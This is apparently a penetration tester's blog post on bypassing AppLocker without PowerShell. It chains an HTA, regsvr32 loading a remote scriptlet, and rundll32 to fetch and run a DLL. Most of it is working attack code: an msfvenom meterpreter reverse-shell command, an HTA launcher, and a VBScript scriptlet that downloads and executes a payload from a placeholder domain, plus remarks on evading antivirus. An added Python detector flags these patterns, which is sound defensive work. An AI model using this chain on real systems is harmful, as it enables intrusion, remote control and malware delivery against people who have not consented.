# Chaining to Bypass AppLocker Without PowerShell

One of the services we provide at work is a “human factor penetration test”, or a social engineering engagement. We position ourselves as an attacker and treat the engagement as a completely red-team exercise to attempt to gain access to the corporate environment without being provided any knowledge of the inner workings of it. Generally speaking, environments either do not have AppLocker or any form of application whitelisting enabled, and/or have PowerShell enabled for use by all users. Recently, I encountered an environment where both of these were false. Luckily (well, for an attacker), I found it was possible to chain a number of previous attacks together in order to bypass both in one fell swoop.

```shell
msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=111.111.111.111 LPORT=443 -a x86 -f dll -o out.dll
```


```html
<html>
<script language="VBScript">
window.moveTo -4000, -4000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run("regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll")
window.close()
</script>
</html>
```


```xml
<?XML version="1.0"?>
<scriptlet>
<registration progid="ProgramID" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
<script language="VBScript">
<![CDATA[
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TMPDir = FSO.GetSpecialFolder(2)

DLLDir = TMPDir & "\" & FSO.GetTempName()
FSO.CreateFolder(DLLDir)
OutFile = DLLDir & "\" & "MSFDLL.dll"

Dim XMLHTTP
Dim BinaryStream

Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")

XMLHTTP.Open "GET", "https://your-domain.com/path/to/your/dll.dll", False
XMLHTTP.Send

With ByteStream
.Type = 1
.Open
.Write XMLHTTP.ResponseBody
.SaveToFile OutFile
End With

Set WSS = CreateObject("Wscript.Shell")
WSS.Run "C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL " & OutFile, 0, true
]]>
</script>
</registration>
</scriptlet>
```


However, some antivirus products detect this, so let’s go one stage deeper and add some mitigations to their mitigations, no?

– BASE64 ENCODING EXAMPLE

Why:

• Generally, VBScript is blocked from making calls such as XMLHTTP Open
• In recent cases (e.g., Windows 10), an HTA’s VBScript is prevented by default from writing remotely fetched files to disk
• regsvr32 does not suffer from these “limitations”
• regsvr32 can execute a “script object” (scriptlet) from a URL
• The scriptlet can be JS, but VBScript is (in this one case in the universe) slightly easier to work with
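As an added defensive example (not part of the original post), the check below flags the process-creation pattern this chain leaves in endpoint telemetry: regsvr32 loading a remote scriptlet via `/i:` plus `scrobj.dll`, regsvr32 spawned by mshta, and rundll32 `Control_RunDLL` pointed at a DLL in a user-writable temp directory. The event records are constructed samples, and the rule names are my own.

```python
import re

# Constructed sample process-creation events (parent image, image, command line).
# Illustrative records only, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\regsvr32.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL "
                r"C:\Users\alice\AppData\Local\Temp\rad1A2B.tmp\MSFDLL.dll"},
    {"parent": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},          # benign install
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl"},         # benign control panel
]

# /i: argument that is a URL rather than a local path, and the scriptlet host DLL
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)
SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)
# Control_RunDLL followed by the DLL/CPL argument it will load
CONTROL_RUNDLL = re.compile(r"Control_RunDLL\s+(?P<arg>.+)$", re.IGNORECASE)
# Directories a standard user can write to, where AppLocker path rules are often loose
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Temp|Downloads|Public)\\", re.IGNORECASE)


def classify(event):
    """Return the list of rule names the event matches (empty when nothing fires)."""
    hits = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    if image.endswith("regsvr32.exe") and REMOTE_SCRIPTLET.search(cmd) and SCROBJ.search(cmd):
        hits.append("regsvr32_remote_scriptlet")
    if image.endswith("regsvr32.exe") and parent.endswith("mshta.exe"):
        hits.append("mshta_spawns_regsvr32")
    if image.endswith("rundll32.exe"):
        m = CONTROL_RUNDLL.search(cmd)
        if m and USER_WRITABLE.search(m.group("arg")):
            hits.append("rundll32_control_rundll_user_writable_dll")
    return hits


def scan(events):
    """Return (index, hits) for every event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]
```

Each rule also fires on its own, so a chain that swaps out one stage (for example a JS scriptlet instead of VBScript) still trips the others.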

Mitigations:

• Some antivirus products detect this; it can be defeated by using Base64 encoding instead of pulling the file from the Internet
• I couldn’t get B64 working at the time.

Neat, huh? Having this “just work” would be - obviously - irresponsible. While you could copy and paste this code, edit the template a touch, and push it to a server and have it work, modern antivirus will detect the HTA file as being malware. It’s an exercise for the reader as to how to mitigate this.